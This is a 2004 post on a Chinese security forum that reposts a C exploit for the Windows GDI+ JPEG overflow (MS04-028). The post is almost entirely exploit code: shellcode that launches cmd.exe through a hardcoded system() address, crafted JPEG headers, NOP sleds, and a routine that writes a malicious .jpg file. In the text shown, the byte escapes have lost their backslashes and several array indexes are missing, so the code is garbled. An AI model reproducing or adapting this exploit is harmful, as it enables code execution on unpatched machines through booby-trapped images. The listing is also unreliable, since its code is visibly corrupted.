Windows JPEG GDI+ Overflow Shellcoded Exploit (MS04-028)

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6818
精华: 835
积分: 36108
阅读权限: 255
性别: 男
来自: 中国
在线时间: 579 小时
注册时间: 2004-6-25
最后登录: 2008-7-23

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-9-24 01:34 只看该作者

Windows JPEG GDI+ Overflow Shellcoded Exploit (MS04-028)

文章作者：FoToZ

复制内容到剪贴板

代码:

// launch a local cmd.exe (not bound to the net)... 

// GDI+ buffer overrun exploit by FoToZ 

// NB: the headers here are only sample headers taken from a .JPG file, 

// with the FF FE 00 01 inserted in header1. 

// Sample shellcode is provided 

// You can put approx. 2500 bytes of shellcode...who needs that much anyway 

// Tested on an unpatched WinXP SP1 



#include <direct.h> 

#include <stdio.h> 



char shellcode[]= 

"x68" // push 

"cmd " 

"x8BxC4" // mov eax,esp 

"x50" // push eax 

"xB8x44x80xC2x77" // mov eax,77c28044h (address of system() on WinXP SP1) 

"xFFxD0" // call eax 

; 



char header1[]= 

"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64" 

"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00" 

"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65" 

"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19" 

"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26" 

"x2Ex3Ex35x35x35x35x35x3E"; 



char setNOPs1[]= 

"xE8x00x00x00x00x5Bx8Dx8B" 

"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"; 



char setNOPs2[]= 

"x3ExE8x00x00x00x00x5Bx8Dx8B" 

"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8"; 



char header2[]= 

"x44" 

"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19" 

"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B" 

"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44" 

"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44" 

"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00" 

"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01" 

"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00" 

"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01" 

"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02" 

"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01" 

"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05" 

"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0" 

"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83" 

"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03" 

"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71" 

"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92" 

"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00" 

"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC" 

"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19" 

"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF" 

"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9" 

"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F" 

"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71" 

"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96" 

"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0" 

"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23" 

"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F" 

"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA" 

"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A" 

"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B" 

"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86" 

"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5" 

"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02" 

"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47" 

"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82" 

"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55" 

"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4" 

"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84" 

"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12" 

"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B" 

"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E" 

"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B" 

"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E" 

"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97" 

"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA" 

"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2" 

"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE" 

"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7" 

"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24" 

"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B" 

"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3" 

"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E" 

"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35" 

"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD" 

"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D" 

"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35" 

"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27" 

"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B" 

"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42" 

"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2" 

"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7" 

"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46" 

"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F" 

"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20" 

"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA" 

"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F" 

"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8" 

"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45" 

"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B" 

"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82" 

"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93" 

"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F" 

"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68" 

; 



void main() 

{ 

      FILE *fin,*fout; 

      unsigned int i=0,j=0; 

      unsigned char c; 

  mkdir("FoToZ_JPEG"); 

  fout=fopen("FoToZ_JPEG\FoToZ.jpg","wb"); 

      

      if( !fout ) { 

           printf("ERROR OPENING FILESn"); 

           return; 

      } 

      printf("shellcode size is %u bytesn", sizeof(shellcode)-1); 

      for(i=0;i<sizeof(shellcode)-1;i++) 

           if( 0xD9FF == *(unsigned short *)&shellcode ) { 

                printf("WARNING: SHELLCODE CONTAINS FFh D9hn" 

                       "FIX UR SHELLCODEn"); 

                return; 

           } 

      j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3; 

      for(i=0;i<sizeof(header1)-1;i++) 

  fputc(header1,fout); 

      for(i=0;i<sizeof(setNOPs1)-1;i++) 

  fputc(setNOPs1,fout); 

      for(i=0;i<sizeof(header2)-1;i++) 

  fputc(header2,fout); 

      for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs 

      j=i; 

      for(i=0;i<sizeof(shellcode)-1;i++) 

  fputc(shellcode,fout); 

      for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++) 

  fputc(0x90,fout); // stuff NOPs 

      // (stuffing NOPs is becoming a bad habit) 

      for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++) 

  fputc(setNOPs2[j],fout); 

      

      fprintf(fout,"xFFxD9"); 

      fcloseall(); 

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » 毒箭羽翼[ Shellcodez Query ] » Windows JPEG GDI+ Overflow Shellcoded Exploit (MS04-028)